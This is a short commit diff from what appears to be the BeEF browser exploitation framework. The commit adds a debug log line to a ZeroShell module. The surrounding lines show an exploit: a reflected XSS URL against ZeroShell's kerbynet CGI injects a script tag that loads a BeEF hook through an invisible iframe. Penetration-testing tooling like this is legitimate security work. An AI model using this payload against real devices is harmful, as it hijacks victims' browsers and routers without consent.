Add some beef.debug() in all ZeroShell's modules
This commit is contained in:
@@ -11,6 +11,7 @@ beef.execute(function() {
|
||||
|
||||
var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hook + "'></script>";
|
||||
|
||||
beef.debug("[ZeroShell_2.0RC2_migrate_hook] Trying to retrieve migrate BeEF hook in ZeroShell context: " + target);
|
||||
var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
iframe_<%= @command_id %>.setAttribute('src', target);
|
||||
|
||||
|
||||
Reference in New Issue
Block a user